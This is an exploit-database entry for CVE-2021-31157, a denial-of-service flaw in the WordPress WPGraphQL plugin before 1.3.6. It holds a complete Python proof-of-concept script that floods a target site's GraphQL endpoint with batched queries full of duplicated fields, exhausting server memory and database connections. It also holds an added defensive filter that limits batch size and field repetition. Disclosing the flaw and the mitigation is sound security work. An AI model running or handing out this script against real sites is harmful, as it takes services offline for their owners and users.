WPGraphQL < 1.3.6 - Denial of Service

Published: 27 Apr 2021 00:00:00
Reported by: Dolev Farhi
Type: wpexploit
Views: 529

WordPress GraphQL 1.3.5 Denial of Service attack using field duplication and batched queries to cause server OOM and MySQL connection error

Related:
- Patchstack: WordPress WPGraphQL plugin <= 1.3.5 - Denial of Service vulnerability (12 Apr 2021 00:00, patchstack)
- CVE: CVE-2021-31157 (20 Apr 2022 19:48, cve)
- WPVulnDB: WPGraphQL < 1.3.6 - Denial of Service (27 Apr 2021 00:00, wpvulndb)

"""
  This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors.
"""

import sys
import requests


def usage():
  print('* WordPress GraphQL 1.3.5 Denial of Service *')
  print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0]))
  print('python {} http://site.com 10000 100'.format(sys.argv[0]))
  sys.exit(1)

if len(sys.argv) < 4:
  print('Missing arguments!')
  usage()

def wpgql_exists():
  try:
    r = requests.post(WORDPRESS_URL, json='x')
    if 'GraphQL' in r.json()['errors'][0]['message']:
      return True
  except Exception:
    pass
  return False

# This PoC assumes graphql is located at index.php?graphql
WORDPRESS_URL = sys.argv[1] + '/index.php?graphql'
FORCE_MULTIPLIER = int(sys.argv[2])
CHAINED_REQUESTS = int(sys.argv[3])

if not wpgql_exists():
  print('Could not identify GraphQL running at "/index.php?graphql"')
  sys.exit(1)

queries = []

payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER
query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'}

for _ in range(0, CHAINED_REQUESTS):
  queries.append(query)

r = requests.post(WORDPRESS_URL, json=queries)
print('Time took: {} seconds '.format(r.elapsed.total_seconds()))
print('Response:', r.json())
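
A defensive counterpart to the script above, added here as an example (it is not part of the original PoC or of WPGraphQL): a pre-filter that rejects oversized batches and selection sets that repeat the same field many times, the two amplifiers the description names. The limits, reason codes and function names are assumptions chosen for illustration.

```python
import re
from collections import Counter

# Assumed limits for illustration; tune them to the largest legitimate query you serve.
MAX_BATCH = 10      # operations allowed in one batched HTTP request
MAX_REPEATS = 5     # times one name may recur inside a single selection set
MAX_TOKENS = 2000   # names and braces allowed in one query document

TOKEN = re.compile(r'[{}]|[_A-Za-z][_0-9A-Za-z]*')


def max_field_repeats(query):
    """Return (token_count, highest count of one name within one selection set).

    Heuristic tokenizer: it does not parse strings, arguments or fragments,
    so treat it as a cheap pre-filter in front of a real GraphQL parser.
    """
    stack, worst, tokens = [Counter()], 0, 0
    for tok in TOKEN.findall(query):
        tokens += 1
        if tok == '{':
            stack.append(Counter())      # entering a new selection set
        elif tok == '}':
            if len(stack) > 1:
                stack.pop()              # back to the parent selection set
        else:
            stack[-1][tok] += 1
            worst = max(worst, stack[-1][tok])
    return tokens, worst


def check_request(body):
    """body is the decoded JSON POST body: one operation (dict) or a batch (list)."""
    ops = body if isinstance(body, list) else [body]
    if len(ops) > MAX_BATCH:
        return False, 'batch_too_large'
    for op in ops:
        query = op.get('query') if isinstance(op, dict) else None
        if not isinstance(query, str):
            return False, 'missing_query'
        tokens, repeats = max_field_repeats(query)
        if tokens > MAX_TOKENS:
            return False, 'query_too_large'
        if repeats > MAX_REPEATS:
            return False, 'field_repeated'
    return True, 'ok'
```

Run it on the decoded request body before the query reaches the GraphQL executor, and log the returned reason code so repeated rejections from one client can be alerted on.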

Vulners AI Score: 6.6 (Medium risk)